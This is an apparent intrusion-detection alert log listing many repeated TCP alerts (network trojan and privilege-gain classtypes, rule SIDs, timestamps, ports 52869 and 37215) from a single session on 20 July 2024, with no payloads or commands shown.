                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.668423
                      SID:2831300
                      Source Port:35588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.532321
                      SID:2027339
                      Source Port:40792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.439699
                      SID:2027339
                      Source Port:34974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.347403
                      SID:2831300
                      Source Port:53360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.701650
                      SID:2027339
                      Source Port:43966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.646796
                      SID:2027339
                      Source Port:32828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.176055
                      SID:2025132
                      Source Port:45692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:23.241818
                      SID:2027339
                      Source Port:59786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.129772
                      SID:2835222
                      Source Port:54418
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.421312
                      SID:2829579
                      Source Port:48528
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.571973
                      SID:2831300
                      Source Port:59612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.325662
                      SID:2835222
                      Source Port:41594
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:25.723282
                      SID:2027339
                      Source Port:44538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.939162
                      SID:2027339
                      Source Port:33898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.498027
                      SID:2829579
                      Source Port:42948
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.994885
                      SID:2829579
                      Source Port:57982
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.586892
                      SID:2027339
                      Source Port:54024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.648191
                      SID:2025132
                      Source Port:33710
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:20.768887
                      SID:2027339
                      Source Port:58148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.384402
                      SID:2025132
                      Source Port:43878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.044038
                      SID:2829579
                      Source Port:36706
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.159827
                      SID:2025132
                      Source Port:54226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.694473
                      SID:2027339
                      Source Port:60960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.262546
                      SID:2025132
                      Source Port:55086
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.821284
                      SID:2027339
                      Source Port:35140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.535864
                      SID:2025132
                      Source Port:51832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.400253
                      SID:2025132
                      Source Port:47724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.857328
                      SID:2829579
                      Source Port:37766
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.723902
                      SID:2025132
                      Source Port:32916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.080292
                      SID:2027339
                      Source Port:57220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.431582
                      SID:2027339
                      Source Port:44534
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.788274
                      SID:2835222
                      Source Port:57584
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.855356
                      SID:2027339
                      Source Port:42572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.684507
                      SID:2027339
                      Source Port:37610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.347403
                      SID:2027339
                      Source Port:47556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.081357
                      SID:2027339
                      Source Port:52892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.125782
                      SID:2829579
                      Source Port:43922
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.400253
                      SID:2027339
                      Source Port:44972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.787018
                      SID:2027339
                      Source Port:36230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.622534
                      SID:2835222
                      Source Port:43180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.984660
                      SID:2027339
                      Source Port:51872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.044038
                      SID:2835222
                      Source Port:47692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.896492
                      SID:2025132
                      Source Port:40346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.620376
                      SID:2025132
                      Source Port:34738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.022964
                      SID:2829579
                      Source Port:49642
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.893722
                      SID:2831300
                      Source Port:43044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:30.233615
                      SID:2025132
                      Source Port:58912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.462705
                      SID:2027339
                      Source Port:47276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.395251
                      SID:2831300
                      Source Port:56524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.860838
                      SID:2829579
                      Source Port:33640
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324397
                      SID:2835222
                      Source Port:34438
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.594036
                      SID:2025132
                      Source Port:34540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.286385
                      SID:2027339
                      Source Port:36696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.256977
                      SID:2027339
                      Source Port:45200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.694694
                      SID:2025132
                      Source Port:35822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.368197
                      SID:2027339
                      Source Port:58826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:28.049580
                      SID:2027339
                      Source Port:55886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.058966
                      SID:2027339
                      Source Port:47990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.453690
                      SID:2831300
                      Source Port:41236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.777005
                      SID:2835222
                      Source Port:45026
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859349
                      SID:2835222
                      Source Port:49380
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.172058
                      SID:2025132
                      Source Port:57592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.487251
                      SID:2831300
                      Source Port:51654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.905764
                      SID:2831300
                      Source Port:59292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.547888
                      SID:2027339
                      Source Port:56056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.526908
                      SID:2835222
                      Source Port:40708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.793806
                      SID:2025132
                      Source Port:51786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.787018
                      SID:2831300
                      Source Port:56596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.598746
                      SID:2025132
                      Source Port:38230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.939156
                      SID:2025132
                      Source Port:44712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.006516
                      SID:2831300
                      Source Port:51074
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.999691
                      SID:2025132
                      Source Port:52930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.066947
                      SID:2829579
                      Source Port:58042
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.662427
                      SID:2027339
                      Source Port:49196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.982926
                      SID:2025132
                      Source Port:35896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:07.419849
                      SID:2829579
                      Source Port:58556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.609530
                      SID:2025132
                      Source Port:50848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.480465
                      SID:2025132
                      Source Port:47860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.455250
                      SID:2027339
                      Source Port:57514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.599614
                      SID:2027339
                      Source Port:38566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.081357
                      SID:2027339
                      Source Port:56852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.570834
                      SID:2831300
                      Source Port:54386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.359662
                      SID:2829579
                      Source Port:37488
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.809385
                      SID:2027339
                      Source Port:51958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.462008
                      SID:2027339
                      Source Port:33274
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.816478
                      SID:2025132
                      Source Port:39368
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.639265
                      SID:2027339
                      Source Port:36898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.186863
                      SID:2027339
                      Source Port:37326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.300719
                      SID:2027339
                      Source Port:35748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324297
                      SID:2835222
                      Source Port:58394
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.516715
                      SID:2027339
                      Source Port:60856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.139794
                      SID:2831300
                      Source Port:38652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.236975
                      SID:2027339
                      Source Port:54390
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.829338
                      SID:2835222
                      Source Port:47806
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.343227
                      SID:2829579
                      Source Port:54982
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.589626
                      SID:2831300
                      Source Port:35704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:58.705456
                      SID:2027339
                      Source Port:35888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.017538
                      SID:2027339
                      Source Port:41264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.067283
                      SID:2025132
                      Source Port:40530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.245949
                      SID:2829579
                      Source Port:40688
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.549014
                      SID:2025132
                      Source Port:33456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.330485
                      SID:2027339
                      Source Port:56874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.874981
                      SID:2027339
                      Source Port:36192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.442743
                      SID:2831300
                      Source Port:50770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.469685
                      SID:2027339
                      Source Port:54866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.888801
                      SID:2831300
                      Source Port:53676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:58.927502
                      SID:2027339
                      Source Port:38696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:44.280800
                      SID:2027339
                      Source Port:41294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.193478
                      SID:2027339
                      Source Port:57234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.544145
                      SID:2831300
                      Source Port:43998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:14.126981
                      SID:2025132
                      Source Port:41828
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.624854
                      SID:2829579
                      Source Port:56584
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.666608
                      SID:2027339
                      Source Port:40758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:36.969912
                      SID:2027339
                      Source Port:38820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.342053
                      SID:2831300
                      Source Port:56988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.623283
                      SID:2025132
                      Source Port:53940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.219605
                      SID:2025132
                      Source Port:53562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.993675
                      SID:2835222
                      Source Port:34502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.461168
                      SID:2027339
                      Source Port:49908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.035971
                      SID:2831300
                      Source Port:42760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.402808
                      SID:2027339
                      Source Port:55154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323623
                      SID:2829579
                      Source Port:58684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.262276
                      SID:2831300
                      Source Port:48052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.328640
                      SID:2835222
                      Source Port:43506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.602106
                      SID:2025132
                      Source Port:38998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.444445
                      SID:2027339
                      Source Port:58972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.424976
                      SID:2835222
                      Source Port:32968
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:54.435154
                      SID:2027339
                      Source Port:51002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.097414
                      SID:2027339
                      Source Port:56162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.648426
                      SID:2835222
                      Source Port:44460
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.331311
                      SID:2027339
                      Source Port:44232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.531553
                      SID:2835222
                      Source Port:59726
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.437584
                      SID:2829579
                      Source Port:54366
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.620654
                      SID:2027339
                      Source Port:58234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.672264
                      SID:2027339
                      Source Port:46058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.052134
                      SID:2025132
                      Source Port:36036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.280739
                      SID:2027339
                      Source Port:47762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.066444
                      SID:2027339
                      Source Port:53802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.474845
                      SID:2831300
                      Source Port:42696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.106041
                      SID:2829579
                      Source Port:55702
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.392409
                      SID:2831300
                      Source Port:44516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.138503
                      SID:2027339
                      Source Port:40162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.391443
                      SID:2027339
                      Source Port:49752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:04.503671
                      SID:2027339
                      Source Port:59586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.444876
                      SID:2027339
                      Source Port:52012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.044038
                      SID:2835222
                      Source Port:33990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.802006
                      SID:2027339
                      Source Port:44494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.388862
                      SID:2831300
                      Source Port:59500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:28.537428
                      SID:2025132
                      Source Port:49462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.211571
                      SID:2027339
                      Source Port:34238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.615827
                      SID:2025132
                      Source Port:42878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.644646
                      SID:2027339
                      Source Port:47142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.138961
                      SID:2831300
                      Source Port:60712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:34.148721
                      SID:2027339
                      Source Port:37884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.971654
                      SID:2835222
                      Source Port:37178
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.949656
                      SID:2025132
                      Source Port:47112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.015093
                      SID:2027339
                      Source Port:53170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.422953
                      SID:2027339
                      Source Port:46502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.348098
                      SID:2831300
                      Source Port:40532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.124977
                      SID:2025132
                      Source Port:37098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.552295
                      SID:2831300
                      Source Port:56312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.936014
                      SID:2025132
                      Source Port:47634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.576749
                      SID:2835222
                      Source Port:51880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:30.483001
                      SID:2025132
                      Source Port:34668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.172604
                      SID:2027339
                      Source Port:34862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.088545
                      SID:2835222
                      Source Port:48774
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.291750
                      SID:2027339
                      Source Port:38148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.487250
                      SID:2831300
                      Source Port:55308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.498027
                      SID:2829579
                      Source Port:36008
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.813206
                      SID:2025132
                      Source Port:51954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.774972
                      SID:2027339
                      Source Port:41152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.469355
                      SID:2025132
                      Source Port:44278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.475548
                      SID:2027339
                      Source Port:46508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.615405
                      SID:2025132
                      Source Port:60514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.403074
                      SID:2835222
                      Source Port:48124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.771399
                      SID:2829579
                      Source Port:52362
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327719
                      SID:2829579
                      Source Port:60832
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.706627
                      SID:2027339
                      Source Port:57548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.994984
                      SID:2025132
                      Source Port:49334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.993689
                      SID:2025132
                      Source Port:44586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
